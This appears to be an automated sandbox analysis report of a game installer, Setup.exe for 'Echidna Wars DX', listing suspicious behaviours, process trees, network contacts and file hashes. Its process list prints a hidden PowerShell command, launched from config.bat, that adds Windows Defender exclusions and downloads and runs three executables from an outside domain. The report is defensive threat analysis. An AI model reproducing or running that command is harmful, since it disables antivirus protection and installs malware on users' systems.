Analysis Overview
SHA256
0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29
Threat Level: Shows suspicious behavior
The file Setup.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-22 20:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-22 20:18
Reported
2024-02-22 20:21
Platform
win10-20240221-en
Max time kernel
64s
Max time network
77s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
Checks installed software on the system
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Echidna Wars DX\Game.exe |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
| N/A | N/A | C:\Echidna Wars DX\Game.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit
C:\Echidna Wars DX\Game.exe
"C:\Echidna Wars DX\Game.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 772
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | jeuxviddeo.com | udp |
Files
memory/3992-0-0x0000000000400000-0x00000000004DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
| MD5 | 9665ccc8017eab35c9bea56ab727692a |
| SHA1 | 177a4d25e994e3a5e792360ce1ef48a25c9600e3 |
| SHA256 | dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c |
| SHA512 | df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5 |
memory/4100-5-0x00000000009B0000-0x00000000009B1000-memory.dmp
memory/3992-12-0x0000000000400000-0x00000000004DB000-memory.dmp
memory/4100-15-0x0000000000400000-0x0000000000717000-memory.dmp
C:\Echidna Wars DX\Game.exe
| MD5 | 5769be658b2478d3d437c152adec05cf |
| SHA1 | 9794744bd45a038641f219ecefd31fa2e239ebbd |
| SHA256 | 4df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e |
| SHA512 | 8491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e |
C:\Echidna Wars DX\config.bat
| MD5 | 62f9201f9ed75ebef04946bcdf72d95a |
| SHA1 | 5779fad609e0c77363e6436230954243c29c9205 |
| SHA256 | f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847 |
| SHA512 | ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806 |
memory/4600-70-0x00000000727A0000-0x0000000072E8E000-memory.dmp
memory/4600-71-0x0000000007130000-0x0000000007140000-memory.dmp
memory/4600-72-0x0000000004A50000-0x0000000004A86000-memory.dmp
memory/4600-73-0x0000000007770000-0x0000000007D98000-memory.dmp
memory/4100-75-0x0000000000400000-0x0000000000717000-memory.dmp
memory/3992-76-0x0000000000400000-0x00000000004DB000-memory.dmp
memory/4600-77-0x00000000073E0000-0x0000000007402000-memory.dmp
memory/4600-79-0x0000000007E70000-0x0000000007ED6000-memory.dmp
memory/4600-78-0x0000000007580000-0x00000000075E6000-memory.dmp
memory/4600-80-0x0000000007EE0000-0x0000000008230000-memory.dmp
memory/4600-83-0x00000000071A0000-0x00000000071BC000-memory.dmp
memory/4600-84-0x0000000008720000-0x000000000876B000-memory.dmp
memory/4600-85-0x00000000085A0000-0x0000000008616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjmxpfe2.ck4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4600-102-0x000000007F470000-0x000000007F480000-memory.dmp
memory/4600-103-0x0000000009450000-0x0000000009483000-memory.dmp
memory/4600-104-0x00000000742C0000-0x000000007430B000-memory.dmp
memory/4600-105-0x0000000009490000-0x00000000094AE000-memory.dmp
memory/4600-110-0x00000000094B0000-0x0000000009555000-memory.dmp
memory/4600-111-0x0000000007130000-0x0000000007140000-memory.dmp
memory/4600-112-0x00000000099C0000-0x0000000009A54000-memory.dmp
C:\Echidna Wars DX\Game.exe
| MD5 | 7de3741fb79dcfa8df54a4daa90c8692 |
| SHA1 | 8003f910997a50719d55ff098f42a23d13598b08 |
| SHA256 | 86b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b |
| SHA512 | 31f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c |
C:\Echidna Wars DX\Game.exe
| MD5 | 4e26e69b1622efa982a86cbe2edd5801 |
| SHA1 | 8d75b18942f4ab79e29457d12d47cb7bb8763612 |
| SHA256 | 4251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472 |
| SHA512 | 2f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7 |
C:\Echidna Wars DX\ovplay.dll
| MD5 | def47290ed52d7ce0a2e65e8ffac95a2 |
| SHA1 | 0edc4bb840d995a5d80f1cd15026e655c817a6ce |
| SHA256 | 558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc |
| SHA512 | 469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208 |
\Echidna Wars DX\hmm.dll
| MD5 | 401a237f4e02457713382b2413a4800c |
| SHA1 | fcddfc03d93011efb0e0910c456aa47f2e632057 |
| SHA256 | 5eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565 |
| SHA512 | 443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61 |
C:\Echidna Wars DX\hspda.dll
| MD5 | 88735cdf603d77cceef556215e43a45f |
| SHA1 | 47a4d364015a3f17143978b32aeb35220c54cb0a |
| SHA256 | 0ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212 |
| SHA512 | 06995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71 |
memory/4500-166-0x0000000000630000-0x0000000000642000-memory.dmp
memory/4500-170-0x0000000000650000-0x000000000068C000-memory.dmp
\Echidna Wars DX\hspogg.dll
| MD5 | 8c44de023765b683fce13c7d17a00add |
| SHA1 | b5256452df6f534057271a8cd1df817ce3a5bbe7 |
| SHA256 | 02859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8 |
| SHA512 | ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2 |
memory/4500-238-0x0000000010100000-0x0000000010126000-memory.dmp
memory/4600-330-0x00000000098C0000-0x00000000098DA000-memory.dmp
memory/4600-335-0x00000000098B0000-0x00000000098B8000-memory.dmp
memory/4600-354-0x0000000009920000-0x000000000993A000-memory.dmp
memory/4600-355-0x0000000009970000-0x0000000009992000-memory.dmp
memory/4600-356-0x000000000A060000-0x000000000A55E000-memory.dmp
memory/4600-361-0x000000000ABE0000-0x000000000B258000-memory.dmp
memory/4600-464-0x00000000727A0000-0x0000000072E8E000-memory.dmp
memory/4500-469-0x0000000010100000-0x0000000010126000-memory.dmp